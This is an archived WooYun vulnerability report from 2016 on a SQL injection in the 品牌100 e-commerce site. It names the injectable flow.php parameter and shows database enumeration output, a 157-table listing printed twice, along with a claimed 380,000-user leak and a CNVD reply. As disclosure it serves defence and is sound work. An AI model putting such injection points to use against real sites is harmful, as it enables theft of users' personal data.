漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2016-0169034
漏洞标题:品牌100s主站sql注入(38万用户信息泄露)
相关厂商:品牌100
漏洞作者: 路人甲
提交时间:2016-01-12 12:48
修复时间:2016-02-27 11:49
公开时间:2016-02-27 11:49
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:15
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2016-01-12: 细节已通知厂商并且等待厂商处理中
2016-01-15: 厂商已经确认,细节仅向厂商公开
2016-01-25: 细节向核心白帽子及相关领域专家公开
2016-02-04: 细节向普通白帽子公开
2016-02-14: 细节向实习白帽子公开
2016-02-27: 细节向公众公开
简要描述:
品牌100sql注入(38万用户信息泄露)
详细说明:
http://**.**.**.**/flow.php?step=calculate_cart_goods_total&rec_id=1
注入点
[*] information_schema
[*] jiewang300
Database: jiewang300
[157 tables]
+-------------------------+
| jw_account_log |
| jw_ad |
| jw_ad_custom |
| jw_ad_position |
| jw_admin_action |
| jw_admin_log |
| jw_admin_message |
| jw_admin_user |
| jw_adsense |
| jw_affiliate_log |
| jw_agency |
| jw_area_region |
| jw_article |
| jw_article_cat |
| jw_attribute |
| jw_auction_log |
| jw_auto_manage |
| jw_back_goods |
| jw_back_order |
| jw_bonus_type |
| jw_booking_goods |
| jw_brand |
| jw_brand_company |
| jw_brand_company_image |
| jw_business_card |
| jw_card |
| jw_card_pay_points |
| jw_card_points_log |
| jw_cart |
| jw_cart_tk |
| jw_cashwithdrawals |
| jw_cat_recommend |
| jw_category |
| jw_category_ydou |
| jw_city |
| jw_collect_goods |
| jw_comment |
| jw_coupons |
| jw_coupons_rule |
| jw_coupons_user |
| jw_crons |
| jw_delivery_goods |
| jw_delivery_order |
| jw_email_list |
| jw_email_sendlist |
| jw_error_log |
| jw_exchange_goods |
| jw_favourable_activity |
| jw_feedback |
| jw_finance_day |
| jw_friend_link |
| jw_goods |
| jw_goods_activity |
| jw_goods_article |
| jw_goods_attr |
| jw_goods_cat |
| jw_goods_cloud |
| jw_goods_gallery |
| jw_goods_shop |
| jw_goods_type |
| jw_group_goods |
| jw_jrzc_cat |
| jw_jrzc_comment |
| jw_jrzc_focus_log |
| jw_jrzc_plan |
| jw_jrzc_replace |
| jw_jrzc_zc |
| jw_jrzc_zc_item |
| jw_jrzc_zc_order |
| jw_keywords |
| jw_lc_jj_brand |
| jw_lc_jj_cate |
| jw_lc_jj_product |
| jw_link_goods |
| jw_mail_templates |
| jw_member_price |
| jw_mengdian |
| jw_mobile_recharge |
| jw_mobile_security_code |
| jw_nav |
| jw_order_action |
| jw_order_goods |
| jw_order_info |
| jw_order_info_tk |
| jw_order_refund |
| jw_pack |
| jw_package_goods |
| jw_param_set |
| jw_pay_log |
| jw_pay_ok_log |
| jw_paylog |
| jw_payment |
| jw_plugins |
| jw_products |
| jw_province |
| jw_red_envelopes |
| jw_red_envelopes_log |
| jw_reg_extend_info |
| jw_reg_fields |
| jw_region |
| jw_registered |
| jw_role |
| jw_searchengine |
| jw_sessions |
| jw_sessions_data |
| jw_share |
| jw_share_buy_log |
| jw_share_statistics |
| jw_sharegoods_module |
| jw_shipping |
| jw_shipping_area |
| jw_shop_config |
| jw_signin |
| jw_snatch_log |
| jw_software |
| jw_software_user |
| jw_square_queue |
| jw_stats |
| jw_suppliers |
| jw_tag |
| jw_template |
| jw_tg_tc_log |
| jw_ticheng_log |
| jw_topic |
| jw_user_account |
| jw_user_address |
| jw_user_bonus |
| jw_user_exchange |
| jw_user_exchange_log |
| jw_user_feed |
| jw_user_invite |
| jw_user_login_log |
| jw_user_param |
| jw_user_parent |
| jw_user_rank |
| jw_user_tc_log |
| jw_user_upgrade_log |
| jw_users |
| jw_users_duxian |
| jw_virtual_card |
| jw_volume_price |
| jw_vote |
| jw_vote_log |
| jw_vote_option |
| jw_wd_rank |
| jw_wholesale |
| jw_wx_menu |
| jw_wx_tpl_msg |
| jw_wxmswmp |
| jw_yd_bang |
| jw_yd_visitor |
| jw_yd_visitor_detail |
| jw_ydhb_log |
| jw_ydou_check |
| jw_ydou_goods |
| jw_yidou_act |
| jw_yifen_log |
+-------------------------+
![CZPFD0B%VR]A_W{A3~KLV8E.png](http://wimg.zone.ci/upload/201601/11102346cc6b252b416806d7306bdf3f7eb55a80.png)
漏洞证明:
http://**.**.**.**/flow.php?step=calculate_cart_goods_total&rec_id=1
注入点
[*] information_schema
[*] jiewang300
Database: jiewang300
[157 tables]
+-------------------------+
| jw_account_log |
| jw_ad |
| jw_ad_custom |
| jw_ad_position |
| jw_admin_action |
| jw_admin_log |
| jw_admin_message |
| jw_admin_user |
| jw_adsense |
| jw_affiliate_log |
| jw_agency |
| jw_area_region |
| jw_article |
| jw_article_cat |
| jw_attribute |
| jw_auction_log |
| jw_auto_manage |
| jw_back_goods |
| jw_back_order |
| jw_bonus_type |
| jw_booking_goods |
| jw_brand |
| jw_brand_company |
| jw_brand_company_image |
| jw_business_card |
| jw_card |
| jw_card_pay_points |
| jw_card_points_log |
| jw_cart |
| jw_cart_tk |
| jw_cashwithdrawals |
| jw_cat_recommend |
| jw_category |
| jw_category_ydou |
| jw_city |
| jw_collect_goods |
| jw_comment |
| jw_coupons |
| jw_coupons_rule |
| jw_coupons_user |
| jw_crons |
| jw_delivery_goods |
| jw_delivery_order |
| jw_email_list |
| jw_email_sendlist |
| jw_error_log |
| jw_exchange_goods |
| jw_favourable_activity |
| jw_feedback |
| jw_finance_day |
| jw_friend_link |
| jw_goods |
| jw_goods_activity |
| jw_goods_article |
| jw_goods_attr |
| jw_goods_cat |
| jw_goods_cloud |
| jw_goods_gallery |
| jw_goods_shop |
| jw_goods_type |
| jw_group_goods |
| jw_jrzc_cat |
| jw_jrzc_comment |
| jw_jrzc_focus_log |
| jw_jrzc_plan |
| jw_jrzc_replace |
| jw_jrzc_zc |
| jw_jrzc_zc_item |
| jw_jrzc_zc_order |
| jw_keywords |
| jw_lc_jj_brand |
| jw_lc_jj_cate |
| jw_lc_jj_product |
| jw_link_goods |
| jw_mail_templates |
| jw_member_price |
| jw_mengdian |
| jw_mobile_recharge |
| jw_mobile_security_code |
| jw_nav |
| jw_order_action |
| jw_order_goods |
| jw_order_info |
| jw_order_info_tk |
| jw_order_refund |
| jw_pack |
| jw_package_goods |
| jw_param_set |
| jw_pay_log |
| jw_pay_ok_log |
| jw_paylog |
| jw_payment |
| jw_plugins |
| jw_products |
| jw_province |
| jw_red_envelopes |
| jw_red_envelopes_log |
| jw_reg_extend_info |
| jw_reg_fields |
| jw_region |
| jw_registered |
| jw_role |
| jw_searchengine |
| jw_sessions |
| jw_sessions_data |
| jw_share |
| jw_share_buy_log |
| jw_share_statistics |
| jw_sharegoods_module |
| jw_shipping |
| jw_shipping_area |
| jw_shop_config |
| jw_signin |
| jw_snatch_log |
| jw_software |
| jw_software_user |
| jw_square_queue |
| jw_stats |
| jw_suppliers |
| jw_tag |
| jw_template |
| jw_tg_tc_log |
| jw_ticheng_log |
| jw_topic |
| jw_user_account |
| jw_user_address |
| jw_user_bonus |
| jw_user_exchange |
| jw_user_exchange_log |
| jw_user_feed |
| jw_user_invite |
| jw_user_login_log |
| jw_user_param |
| jw_user_parent |
| jw_user_rank |
| jw_user_tc_log |
| jw_user_upgrade_log |
| jw_users |
| jw_users_duxian |
| jw_virtual_card |
| jw_volume_price |
| jw_vote |
| jw_vote_log |
| jw_vote_option |
| jw_wd_rank |
| jw_wholesale |
| jw_wx_menu |
| jw_wx_tpl_msg |
| jw_wxmswmp |
| jw_yd_bang |
| jw_yd_visitor |
| jw_yd_visitor_detail |
| jw_ydhb_log |
| jw_ydou_check |
| jw_ydou_goods |
| jw_yidou_act |
| jw_yifen_log |
+-------------------------+
修复方案:
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:8
确认时间:2016-01-15 16:56
厂商回复:
CNVD未直接复现所述情况,暂未建立与网站管理单位的直接处置渠道,待认领。
最新状态:
暂无